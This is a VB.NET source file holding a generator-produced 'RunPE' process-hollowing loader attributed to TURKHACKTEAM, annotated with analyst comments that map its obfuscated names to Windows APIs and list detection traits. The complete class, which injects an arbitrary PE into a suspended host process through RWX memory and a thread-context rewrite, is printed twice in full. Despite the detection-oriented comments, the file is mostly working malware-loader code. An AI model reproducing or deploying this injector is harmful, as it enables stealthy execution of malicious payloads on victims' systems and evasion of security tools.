'''' <summary>
'''' Author : By BTHACK RunPE Generator - TURKHACKTEAM
'''' BTHACK
'''' Call : Dim x AS New bBSPVHwDpLP: x.zqCnGZIPFA( byte() , String )
'''' Purpose : Execute App In Memory from byte array
'''' </summary>
Public Class bBSPVHwDpLP
' Analyst note: generator-produced "RunPE" loader with randomized identifiers.
' The class starts a host program suspended, replaces its mapped image with a
' PE supplied as a byte array, and resumes it -- the process-hollowing pattern
' (MITRE ATT&CK T1055.012). The comments below map each obfuscated name to the
' Windows API or PE field it touches, for triage and detection writing.
'
' Detection-relevant traits visible in this listing:
'  - Only LoadLibraryA, GetProcAddress and CreateProcessW are declared imports;
'    the ntdll and VirtualAllocEx entry points are resolved by name at run time,
'    so their names survive as plain string literals in the binary.
'  - Call order: CreateProcessW (suspended) -> NtUnmapViewOfSection ->
'    VirtualAllocEx (RWX) -> NtWriteVirtualMemory -> NtGetContextThread ->
'    NtSetContextThread -> NtResumeThread.
'  - All pointer arithmetic uses 32-bit values with x86 CONTEXT and PE32 offsets.
'  - Behaviour to alert on: a suspended child whose main image is unmapped and
'    re-backed by private RWX memory, followed by a thread-context write from the
'    parent; after that the running image no longer matches the file on disk.

' WZeLWj = kernel32!LoadLibraryA
Public Declare Function WZeLWj Lib "kernel32" Alias "LoadLibraryA" (ByVal YKGx As String) As IntPtr
' TMZULn = kernel32!GetProcAddress
Public Declare Function TMZULn Lib "kernel32" Alias "GetProcAddress" (ByVal BWVr As IntPtr, ByVal YKGx As String) As IntPtr
' Run-time API resolver: loads library YKGx, looks up export EnZz and wraps the
' returned pointer in a delegate of type T.
Function uHIqxlaqHojZnQO(Of T)(ByVal YKGx As String, ByVal EnZz As String) As T
Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(TMZULn(WZeLWj(YKGx), EnZz), GetType(T)), Object), T)
End Function
' Delegate shapes for the dynamically resolved APIs (binding taken from the
' resolver calls further down):
' HBnBpz -> ntdll!NtGetContextThread (thread handle, CONTEXT as UInteger array)
Delegate Function HBnBpz(ByVal ojK As IntPtr, ByVal kXAcNWTnt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
' FhSXtB -> ntdll!NtUnmapViewOfSection (process handle, base address)
Delegate Function FhSXtB(ByVal vptW As IntPtr, ByVal eCgz As IntPtr) As UInteger
' uOQRmM -> ntdll!NtReadVirtualMemory (process, address, out buffer, size, out bytes read)
Delegate Function uOQRmM(ByVal vptW As IntPtr, ByVal eCgz As IntPtr, ByRef bufr As IntPtr, ByVal bufrQydqpqTah As Integer, ByRef PMaV As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
' HGnRjz -> ntdll!NtResumeThread (thread handle, second argument passed as 0)
Delegate Function HGnRjz(ByVal ojKead As IntPtr, ByVal GNut As IntPtr) As UInteger
' LAdpVu -> ntdll!NtSetContextThread (thread handle, CONTEXT as UInteger array)
Delegate Function LAdpVu(ByVal ojK As IntPtr, ByVal kXAcNWTnt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
' alkChg -> kernel32!VirtualAllocEx (process, address, size, allocation type, protection)
Delegate Function alkChg(ByVal vptW As IntPtr, ByVal mqNu As IntPtr, ByVal QydqpqTah As IntPtr, ByVal VDW As Integer, ByVal irXG As Integer) As IntPtr
' fYKnha -> ntdll!NtWriteVirtualMemory (process, destination, source bytes, length, bytes written)
Delegate Function fYKnha(ByVal vptWess As IntPtr, ByVal jkQesXZAx As IntPtr, ByVal yOOQ As Byte(), ByVal nQydqpqTah As UInteger, ByVal JvnRkwMdN As Integer) As Boolean
' vAAOHL = kernel32!CreateProcessW. STARTUPINFO is passed as a raw Byte() and
' PROCESS_INFORMATION is received as an IntPtr() instead of declared structures.
Public Declare Auto Function vAAOHL Lib "kernel32" Alias "CreateProcessW" (ByVal erhS As String, ByVal MEUu As StringBuilder, ByVal kWsQRvaGq As IntPtr, ByVal Zsre As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal pQio As Boolean, ByVal VtCq As Integer, ByVal DGoS As IntPtr, ByVal QtMC As String, ByVal gRCM As Byte(), ByVal MuWN As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
' Memory peek: reads fjRfQBE bytes (default 4) at address lKlZhVN in the CURRENT
' process through NtReadVirtualMemory and returns them as an Integer. Used below
' to read PE header fields out of the payload buffer by absolute address.
Private Function iwXWbxm(ByVal lKlZhVN As Long, Optional ByVal fjRfQBE As Long = &H4) As Integer
Dim Vrtevkc As IntPtr
Dim CTDVndk As Integer
Dim KZkk As uOQRmM = uHIqxlaqHojZnQO(Of uOQRmM)("ntdll", "NtReadVirtualMemory")
Call KZkk(Process.GetCurrentProcess.Handle, lKlZhVN, Vrtevkc, fjRfQBE, CTDVndk)
Return Vrtevkc
End Function
' Entry point named in the generator banner ("Call : ... x.zqCnGZIPFA( byte() , String )").
'   xaVIxIlj : raw bytes of the PE image to run.
'   rjwHDOey : string handed to CreateProcessW as the command line of the host process.
' Returns False only when an exception is thrown; no API return value is checked,
' so True does not show that the steps succeeded.
Public Function zqCnGZIPFA(ByVal xaVIxIlj As Byte(), ByVal rjwHDOey As String) As Boolean
Try
' Takes the address of the payload buffer through a pinned GCHandle; the handle
' is released again on the same line.
Dim YWNpfici As GCHandle = GCHandle.Alloc(xaVIxIlj, GCHandleType.Pinned) : Dim hModuleBase As Integer = YWNpfici.AddrOfPinnedObject : YWNpfici.Free()
Dim kWsQRvaGq As IntPtr = IntPtr.Zero
' Receives PROCESS_INFORMATION: index 0 is used as the process handle and
' index 1 as the thread handle below.
Dim eqZHGbhBl As IntPtr() = New IntPtr(3) {}
' 68 zero bytes passed in the STARTUPINFO position of CreateProcessW.
Dim vptWYkkde As Byte() = New Byte(67) {}
' e_lfanew: file offset of the NT headers, read at DOS-header offset 60 (0x3C).
Dim cLFwWeIcU As Integer = BitConverter.ToInt32(xaVIxIlj, 60)
Dim hEnJMzIud As Integer
' 179 UIntegers = 716 bytes, the size of the x86 CONTEXT structure.
' Element 0 is ContextFlags; &H10002 is CONTEXT_INTEGER on x86.
Dim kXAcNWTnt As UInteger() = New UInteger(178) {}
kXAcNWTnt(0) = &H10002
' Step 1: start the host process; creation flags 4 = CREATE_SUSPENDED.
vAAOHL(Nothing, New StringBuilder(rjwHDOey), kWsQRvaGq, kWsQRvaGq, False, 4, kWsQRvaGq, Nothing, vptWYkkde, eqZHGbhBl)
' In-memory address of the payload's NT headers (buffer address + e_lfanew).
Dim MEUuTTklx As Integer = (hModuleBase + iwXWbxm(hModuleBase + &H3C))
' NT headers + 0x34 = OptionalHeader.ImageBase (PE32 layout).
hEnJMzIud = iwXWbxm(MEUuTTklx + &H34)
' Step 2: unmap whatever the child has mapped at the payload's preferred base.
Dim Wwsvp As FhSXtB = uHIqxlaqHojZnQO(Of FhSXtB)("ntdll", "NtUnmapViewOfSection")
Wwsvp(eqZHGbhBl(0), hEnJMzIud)
' Step 3: allocate SizeOfImage (NT headers + 0x50) bytes in the child at that
' base; &H3000 = MEM_COMMIT Or MEM_RESERVE, &H40 = PAGE_EXECUTE_READWRITE.
Dim CZLwd As alkChg = uHIqxlaqHojZnQO(Of alkChg)("kernel32", "VirtualAllocEx")
Dim jkQesXZAx As IntPtr = CZLwd(eqZHGbhBl(0), hEnJMzIud, iwXWbxm(MEUuTTklx + &H50), &H3000, &H40)
' Both values are reassigned inside the section loop before they are used.
Dim gWCclyHG As New IntPtr(BitConverter.ToInt32(xaVIxIlj, cLFwWeIcU + &H34))
Dim QydqpqTah As New IntPtr(BitConverter.ToInt32(xaVIxIlj, cLFwWeIcU + 80))
Dim LbPnPUdjh As Integer
Dim JvnRkwMdN As Integer
' Step 4: copy the PE headers (SizeOfHeaders, NT headers + 0x54) into the child.
Dim api8 As fYKnha = uHIqxlaqHojZnQO(Of fYKnha)("ntdll", "NtWriteVirtualMemory")
api8(eqZHGbhBl(0), jkQesXZAx, xaVIxIlj, CUInt(CInt(iwXWbxm(MEUuTTklx + &H54))), LbPnPUdjh)
' Step 5: copy each section; the count is the 2-byte NumberOfSections at NT headers + 6.
For i = 0 To iwXWbxm(MEUuTTklx + &H6, 2) - 1
' One 40-byte section header viewed as ten Integers; the table starts at
' NT headers + 0xF8. Index 3 = VirtualAddress, 4 = SizeOfRawData,
' 5 = PointerToRawData.
Dim zachgJXW As Integer() = New Integer(9) {}
Buffer.BlockCopy(xaVIxIlj, (cLFwWeIcU + &HF8) + (i * 40), zachgJXW, 0, 40)
Dim TrBXElfLc As Byte() = New Byte((zachgJXW(4) - 1)) {}
Buffer.BlockCopy(xaVIxIlj, zachgJXW(5), TrBXElfLc, 0, TrBXElfLc.Length)
' Destination in the child = allocated base + the section's VirtualAddress.
QydqpqTah = New IntPtr(jkQesXZAx.ToInt32() + zachgJXW(3))
gWCclyHG = New IntPtr(TrBXElfLc.Length)
api8(eqZHGbhBl(0), QydqpqTah, TrBXElfLc, CUInt(gWCclyHG), JvnRkwMdN)
Next i
' Step 6: fetch the register context of the suspended primary thread.
Dim COEEt As HBnBpz = uHIqxlaqHojZnQO(Of HBnBpz)("ntdll", "NtGetContextThread")
COEEt(eqZHGbhBl(1), kXAcNWTnt)
' Element 41 is byte offset 0xA4 (Ebx in the x86 CONTEXT). In a freshly created
' suspended x86 process Ebx holds the PEB address, so Ebx + 8 is
' PEB.ImageBaseAddress; the 4-byte write stores the new image base there.
api8(eqZHGbhBl(0), kXAcNWTnt(41) + &H8, BitConverter.GetBytes(jkQesXZAx.ToInt32()), CUInt(&H4), JvnRkwMdN)
' Element &H2C is byte offset 0xB0 (Eax): set to ImageBase + AddressOfEntryPoint
' (NT headers + 0x28), the address the thread starts at once resumed.
kXAcNWTnt(&H2C) = hEnJMzIud + iwXWbxm(MEUuTTklx + &H28)
' Step 7: write the modified context back and let the thread run.
Dim shnwH As LAdpVu = uHIqxlaqHojZnQO(Of LAdpVu)("ntdll", "NtSetContextThread")
shnwH(eqZHGbhBl(1), kXAcNWTnt)
Dim hQuBw As HGnRjz = uHIqxlaqHojZnQO(Of HGnRjz)("ntdll", "NtResumeThread")
hQuBw(eqZHGbhBl(1), 0)
' Any managed exception is swallowed and reported only as False.
Catch ex As Exception
Return False
End Try
Return True
End Function
End Class
'''' <summary>
'''' Author : By BTHACK RunPE Generator - TURKHACKTEAM
'''' BTHACK
'''' Call : Dim x AS New bBSPVHwDpLP: x.zqCnGZIPFA( byte() , String )
'''' Purpose : Execute App In Memory from byte array
'''' </summary>
Public Class bBSPVHwDpLP
' Analyst note: generator-produced "RunPE" loader with randomized identifiers.
' The class starts a host program suspended, replaces its mapped image with a
' PE supplied as a byte array, and resumes it -- the process-hollowing pattern
' (MITRE ATT&CK T1055.012). The comments below map each obfuscated name to the
' Windows API or PE field it touches, for triage and detection writing.
'
' Detection-relevant traits visible in this listing:
'  - Only LoadLibraryA, GetProcAddress and CreateProcessW are declared imports;
'    the ntdll and VirtualAllocEx entry points are resolved by name at run time,
'    so their names survive as plain string literals in the binary.
'  - Call order: CreateProcessW (suspended) -> NtUnmapViewOfSection ->
'    VirtualAllocEx (RWX) -> NtWriteVirtualMemory -> NtGetContextThread ->
'    NtSetContextThread -> NtResumeThread.
'  - All pointer arithmetic uses 32-bit values with x86 CONTEXT and PE32 offsets.
'  - Behaviour to alert on: a suspended child whose main image is unmapped and
'    re-backed by private RWX memory, followed by a thread-context write from the
'    parent; after that the running image no longer matches the file on disk.

' WZeLWj = kernel32!LoadLibraryA
Public Declare Function WZeLWj Lib "kernel32" Alias "LoadLibraryA" (ByVal YKGx As String) As IntPtr
' TMZULn = kernel32!GetProcAddress
Public Declare Function TMZULn Lib "kernel32" Alias "GetProcAddress" (ByVal BWVr As IntPtr, ByVal YKGx As String) As IntPtr
' Run-time API resolver: loads library YKGx, looks up export EnZz and wraps the
' returned pointer in a delegate of type T.
Function uHIqxlaqHojZnQO(Of T)(ByVal YKGx As String, ByVal EnZz As String) As T
Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(TMZULn(WZeLWj(YKGx), EnZz), GetType(T)), Object), T)
End Function
' Delegate shapes for the dynamically resolved APIs (binding taken from the
' resolver calls further down):
' HBnBpz -> ntdll!NtGetContextThread (thread handle, CONTEXT as UInteger array)
Delegate Function HBnBpz(ByVal ojK As IntPtr, ByVal kXAcNWTnt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
' FhSXtB -> ntdll!NtUnmapViewOfSection (process handle, base address)
Delegate Function FhSXtB(ByVal vptW As IntPtr, ByVal eCgz As IntPtr) As UInteger
' uOQRmM -> ntdll!NtReadVirtualMemory (process, address, out buffer, size, out bytes read)
Delegate Function uOQRmM(ByVal vptW As IntPtr, ByVal eCgz As IntPtr, ByRef bufr As IntPtr, ByVal bufrQydqpqTah As Integer, ByRef PMaV As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
' HGnRjz -> ntdll!NtResumeThread (thread handle, second argument passed as 0)
Delegate Function HGnRjz(ByVal ojKead As IntPtr, ByVal GNut As IntPtr) As UInteger
' LAdpVu -> ntdll!NtSetContextThread (thread handle, CONTEXT as UInteger array)
Delegate Function LAdpVu(ByVal ojK As IntPtr, ByVal kXAcNWTnt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
' alkChg -> kernel32!VirtualAllocEx (process, address, size, allocation type, protection)
Delegate Function alkChg(ByVal vptW As IntPtr, ByVal mqNu As IntPtr, ByVal QydqpqTah As IntPtr, ByVal VDW As Integer, ByVal irXG As Integer) As IntPtr
' fYKnha -> ntdll!NtWriteVirtualMemory (process, destination, source bytes, length, bytes written)
Delegate Function fYKnha(ByVal vptWess As IntPtr, ByVal jkQesXZAx As IntPtr, ByVal yOOQ As Byte(), ByVal nQydqpqTah As UInteger, ByVal JvnRkwMdN As Integer) As Boolean
' vAAOHL = kernel32!CreateProcessW. STARTUPINFO is passed as a raw Byte() and
' PROCESS_INFORMATION is received as an IntPtr() instead of declared structures.
Public Declare Auto Function vAAOHL Lib "kernel32" Alias "CreateProcessW" (ByVal erhS As String, ByVal MEUu As StringBuilder, ByVal kWsQRvaGq As IntPtr, ByVal Zsre As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal pQio As Boolean, ByVal VtCq As Integer, ByVal DGoS As IntPtr, ByVal QtMC As String, ByVal gRCM As Byte(), ByVal MuWN As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
' Memory peek: reads fjRfQBE bytes (default 4) at address lKlZhVN in the CURRENT
' process through NtReadVirtualMemory and returns them as an Integer. Used below
' to read PE header fields out of the payload buffer by absolute address.
Private Function iwXWbxm(ByVal lKlZhVN As Long, Optional ByVal fjRfQBE As Long = &H4) As Integer
Dim Vrtevkc As IntPtr
Dim CTDVndk As Integer
Dim KZkk As uOQRmM = uHIqxlaqHojZnQO(Of uOQRmM)("ntdll", "NtReadVirtualMemory")
Call KZkk(Process.GetCurrentProcess.Handle, lKlZhVN, Vrtevkc, fjRfQBE, CTDVndk)
Return Vrtevkc
End Function
' Entry point named in the generator banner ("Call : ... x.zqCnGZIPFA( byte() , String )").
'   xaVIxIlj : raw bytes of the PE image to run.
'   rjwHDOey : string handed to CreateProcessW as the command line of the host process.
' Returns False only when an exception is thrown; no API return value is checked,
' so True does not show that the steps succeeded.
Public Function zqCnGZIPFA(ByVal xaVIxIlj As Byte(), ByVal rjwHDOey As String) As Boolean
Try
' Takes the address of the payload buffer through a pinned GCHandle; the handle
' is released again on the same line.
Dim YWNpfici As GCHandle = GCHandle.Alloc(xaVIxIlj, GCHandleType.Pinned) : Dim hModuleBase As Integer = YWNpfici.AddrOfPinnedObject : YWNpfici.Free()
Dim kWsQRvaGq As IntPtr = IntPtr.Zero
' Receives PROCESS_INFORMATION: index 0 is used as the process handle and
' index 1 as the thread handle below.
Dim eqZHGbhBl As IntPtr() = New IntPtr(3) {}
' 68 zero bytes passed in the STARTUPINFO position of CreateProcessW.
Dim vptWYkkde As Byte() = New Byte(67) {}
' e_lfanew: file offset of the NT headers, read at DOS-header offset 60 (0x3C).
Dim cLFwWeIcU As Integer = BitConverter.ToInt32(xaVIxIlj, 60)
Dim hEnJMzIud As Integer
' 179 UIntegers = 716 bytes, the size of the x86 CONTEXT structure.
' Element 0 is ContextFlags; &H10002 is CONTEXT_INTEGER on x86.
Dim kXAcNWTnt As UInteger() = New UInteger(178) {}
kXAcNWTnt(0) = &H10002
' Step 1: start the host process; creation flags 4 = CREATE_SUSPENDED.
vAAOHL(Nothing, New StringBuilder(rjwHDOey), kWsQRvaGq, kWsQRvaGq, False, 4, kWsQRvaGq, Nothing, vptWYkkde, eqZHGbhBl)
' In-memory address of the payload's NT headers (buffer address + e_lfanew).
Dim MEUuTTklx As Integer = (hModuleBase + iwXWbxm(hModuleBase + &H3C))
' NT headers + 0x34 = OptionalHeader.ImageBase (PE32 layout).
hEnJMzIud = iwXWbxm(MEUuTTklx + &H34)
' Step 2: unmap whatever the child has mapped at the payload's preferred base.
Dim Wwsvp As FhSXtB = uHIqxlaqHojZnQO(Of FhSXtB)("ntdll", "NtUnmapViewOfSection")
Wwsvp(eqZHGbhBl(0), hEnJMzIud)
' Step 3: allocate SizeOfImage (NT headers + 0x50) bytes in the child at that
' base; &H3000 = MEM_COMMIT Or MEM_RESERVE, &H40 = PAGE_EXECUTE_READWRITE.
Dim CZLwd As alkChg = uHIqxlaqHojZnQO(Of alkChg)("kernel32", "VirtualAllocEx")
Dim jkQesXZAx As IntPtr = CZLwd(eqZHGbhBl(0), hEnJMzIud, iwXWbxm(MEUuTTklx + &H50), &H3000, &H40)
' Both values are reassigned inside the section loop before they are used.
Dim gWCclyHG As New IntPtr(BitConverter.ToInt32(xaVIxIlj, cLFwWeIcU + &H34))
Dim QydqpqTah As New IntPtr(BitConverter.ToInt32(xaVIxIlj, cLFwWeIcU + 80))
Dim LbPnPUdjh As Integer
Dim JvnRkwMdN As Integer
' Step 4: copy the PE headers (SizeOfHeaders, NT headers + 0x54) into the child.
Dim api8 As fYKnha = uHIqxlaqHojZnQO(Of fYKnha)("ntdll", "NtWriteVirtualMemory")
api8(eqZHGbhBl(0), jkQesXZAx, xaVIxIlj, CUInt(CInt(iwXWbxm(MEUuTTklx + &H54))), LbPnPUdjh)
' Step 5: copy each section; the count is the 2-byte NumberOfSections at NT headers + 6.
For i = 0 To iwXWbxm(MEUuTTklx + &H6, 2) - 1
' One 40-byte section header viewed as ten Integers; the table starts at
' NT headers + 0xF8. Index 3 = VirtualAddress, 4 = SizeOfRawData,
' 5 = PointerToRawData.
Dim zachgJXW As Integer() = New Integer(9) {}
Buffer.BlockCopy(xaVIxIlj, (cLFwWeIcU + &HF8) + (i * 40), zachgJXW, 0, 40)
Dim TrBXElfLc As Byte() = New Byte((zachgJXW(4) - 1)) {}
Buffer.BlockCopy(xaVIxIlj, zachgJXW(5), TrBXElfLc, 0, TrBXElfLc.Length)
' Destination in the child = allocated base + the section's VirtualAddress.
QydqpqTah = New IntPtr(jkQesXZAx.ToInt32() + zachgJXW(3))
gWCclyHG = New IntPtr(TrBXElfLc.Length)
api8(eqZHGbhBl(0), QydqpqTah, TrBXElfLc, CUInt(gWCclyHG), JvnRkwMdN)
Next i
' Step 6: fetch the register context of the suspended primary thread.
Dim COEEt As HBnBpz = uHIqxlaqHojZnQO(Of HBnBpz)("ntdll", "NtGetContextThread")
COEEt(eqZHGbhBl(1), kXAcNWTnt)
' Element 41 is byte offset 0xA4 (Ebx in the x86 CONTEXT). In a freshly created
' suspended x86 process Ebx holds the PEB address, so Ebx + 8 is
' PEB.ImageBaseAddress; the 4-byte write stores the new image base there.
api8(eqZHGbhBl(0), kXAcNWTnt(41) + &H8, BitConverter.GetBytes(jkQesXZAx.ToInt32()), CUInt(&H4), JvnRkwMdN)
' Element &H2C is byte offset 0xB0 (Eax): set to ImageBase + AddressOfEntryPoint
' (NT headers + 0x28), the address the thread starts at once resumed.
kXAcNWTnt(&H2C) = hEnJMzIud + iwXWbxm(MEUuTTklx + &H28)
' Step 7: write the modified context back and let the thread run.
Dim shnwH As LAdpVu = uHIqxlaqHojZnQO(Of LAdpVu)("ntdll", "NtSetContextThread")
shnwH(eqZHGbhBl(1), kXAcNWTnt)
Dim hQuBw As HGnRjz = uHIqxlaqHojZnQO(Of HGnRjz)("ntdll", "NtResumeThread")
hQuBw(eqZHGbhBl(1), 0)
' Any managed exception is swallowed and reported only as False.
Catch ex As Exception
Return False
End Try
Return True
End Function
End Class